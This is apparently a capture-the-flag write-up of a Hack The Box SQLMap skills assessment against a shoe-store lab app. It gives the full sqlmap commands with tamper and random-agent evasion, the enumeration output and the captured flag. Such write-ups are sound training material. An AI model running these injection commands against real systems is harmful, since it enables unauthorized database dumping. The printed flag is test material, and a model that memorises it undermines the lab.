Well here we are, the big test to make sure we understood our SQLMap training. We're given access to a web application with basic protection mechanisms. Use the skills learned in this module to find the SQLi vulnerability with SQLMap and exploit it accordingly. To complete this module, find the flag and submit it here.
Let's dig in.
We visit the site they provide (note, sometimes you'll see the target IP change in my documentation, that's 'cause I'm a Dad and Husband and get dragged away from my PC often... so I have to re-connect) and we get a shoe store. We can't do anything much and I'm not seeing any way to get a URL with any type of ID or other variable in the URL.
![](https://static.wixstatic.com/media/b4353b_871c5df6937a44c699796651ee4eac30~mv2.png/v1/fill/w_49,h_23,al_c,q_85,usm_0.66_1.00_0.01,blur_2,enc_auto/b4353b_871c5df6937a44c699796651ee4eac30~mv2.png)
After HOURS of clicking around I finally caught it. Going to the shop and adding an item to the cart pops a message. If you watch the network traffic you'll see the php page it's calling and the data it's sending.
![](https://static.wixstatic.com/media/b4353b_370b4c565e104b03a46d13d6d57fd47d~mv2.png/v1/fill/w_49,h_16,al_c,q_85,usm_0.66_1.00_0.01,blur_2,enc_auto/b4353b_370b4c565e104b03a46d13d6d57fd47d~mv2.png)
The initial SQLMap query showed some promise but no data. After messing around for a few more hours with trying to bypass web filtering it turns out that's a JSON dataset... shoulda kept the data output of that transaction to raw.
Either way, there was some tamper protection so we had to random agent and use a tamper script. Unfortunately it had to use a time based attack so it takes FOREVER. I setup our SQLMap statement to look like this:
sqlmap -u '83.136.252.24:32574/action.php' --data='{"id":1}' --tamper=between --random-agent --batch --dump
In fact because it took so long the VPN timed out before I could get a full database dump on it. We instead decided to break it down into smaller chunks so we had the needed data. We first did a banner grab, what the user and db is and if that is a dba user.
sqlmap -u 'http://94.237.48.48:51313/action.php' --data='{"id":1}' --tamper=between --random-agent --banner --current-user --current-db --is-dba
![](https://static.wixstatic.com/media/b4353b_f3ddde90c7274a128800745d7595ea67~mv2.png/v1/fill/w_110,h_57,al_c,q_85,usm_0.66_1.00_0.01,blur_2,enc_auto/b4353b_f3ddde90c7274a128800745d7595ea67~mv2.png)
Next we're going to grab the tables
sqlmap -u 'http://94.237.48.48:51313/action.php' --data='{"id":1}' --tamper=between --random-agent --tables -D production --batch
Database: production
[5 tables]
+-------------+
| brands |
| categories |
| final_flag |
| order_items |
| products |
+-------------+
Next we grab the table of interest there - final_flag
sqlmap -u 'http://94.237.48.48:51313/action.php' --data='{"id":1}' --tamper=between --random-agent --dump -T final_flag -D production --batch
and voila - we have our flag.
Database: production
Table: final_flag
[1 entry]
+----+--------------------------+
| id | content |
+----+--------------------------+
| 1 | HTB{n07_50_h4rd_r16h7?!} |
+----+--------------------------+